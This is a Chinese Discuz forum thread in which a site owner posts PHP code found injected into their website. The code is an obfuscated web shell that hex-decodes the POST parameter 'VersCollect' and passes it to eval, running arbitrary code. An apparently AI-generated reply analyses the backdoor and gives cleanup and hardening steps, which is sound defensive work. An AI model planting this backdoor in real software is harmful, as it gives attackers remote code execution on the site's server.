·设为首页收藏本站📧邮箱修改🎁免费下载专区📒收藏夹👽聊天室📱AI智能体
返回列表 发布新帖

网址部分php被恶意添加代码了 请问这是什么意思

1105 1
发表于 2021-4-27 13:48:59 | 查看全部 阅读模式

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
class _
{
    static public $TokenUserLoger=Null;
    function __construct($l="error"){
        self::$TokenUserLoger=$l;
        @eval/*This error level Listensing*/(null.null.self::$TokenUserLoger);
    }
}
function hexToStr($hex){   
        $str="";
        for($i=0;$i<strlen($hex)-1;$i+=2)
        $str.=chr(hexdec($hex[$i].$hex[$i+1]));
        return  $str;
    }
$TokenError = null.hexToStr(@$_POST/*\*/["VersCollect"]);
$d = new _($TokenError);

上面是被恶意添加的
我要说一句 收起回复

评论1

Discuz智能体Lv.8 发表于 2025-3-15 18:26:58 | 查看全部
您提供的这段PHP代码存在明显的恶意后门特征,属于典型的webshell木马程序。以下是代码分析及处理建议:

一、代码解析:
1. 类名设计异常:使用单下划线"_"作为类名,这是攻击者为隐蔽性采用的常见手法
2. 危险函数调用:通过@eval(/*注释混淆*/.null.null.self::$TokenUserLoger)构造动态代码执行
3. 十六进制解码函数:hexToStr函数可将攻击载荷进行编码传输(当前代码片段不完整)
4. 代码混淆特征:使用null.null进行空值拼接,配合注释分割eval关键字,绕过基础检测

二、攻击原理:
该木马通过以下方式运作:
1. 接收外部传入的加密代码(可能通过Cookie、POST参数等方式)
2. 使用hexToStr函数进行解码
3. 通过eval函数动态执行任意PHP代码
4. @符号用于抑制错误输出,增强隐蔽性

三、解决方案:
1. 紧急处理:
- 立即删除该恶意代码文件
- 使用D盾、河马查杀等专业工具全站扫描
- 检查最近7天被修改的.php文件(重点排查非官方插件目录)

2. 安全加固:
- 检查服务器是否存在任意文件写入漏洞(重点排查附件上传模块)
- 重置服务器SSH/FTP密码,确保使用高强度凭证
- 更新Discuz!到最新版本,可通过DZ插件网获取安全补丁

3. 入侵排查:
- 分析access.log日志,查找可疑的POST请求
- 检查数据库用户表是否有异常管理员账号
- 审查template模板文件是否被植入恶意代码

四、Discuz!专项防护建议:
1. 禁用危险函数:
在php.ini中设置:
disable_functions = eval,passthru,exec,system

2. 文件监控设置:
对以下目录添加写保护:
- /source/plugin/
- /template/
- /data/

3. 加强权限验证:
修改config/config_global.php中:
$_config['admincp']['checkip'] = 1;
$_config['security']['querysafe']['status'] = 1;

该类型木马具有持久化攻击能力,建议完成清理后通过DZ插件网的安全审计插件进行深度检测。后续可通过文件校验功能监控核心文件完整性,防范未授权篡改。
-- 本回答由 人工智能 AI智能体 生成,内容仅供参考,请仔细甄别。
我要说一句 收起回复

回复

 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

图文热点
关闭

站长推荐上一条 /1 下一条

AI智能体
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:3.141.167.59,GMT+8, 2025-4-29 10:34 , Processed in 0.235531 second(s), 73 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2025 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
QQ客服返回顶部
快速回复 返回顶部 返回列表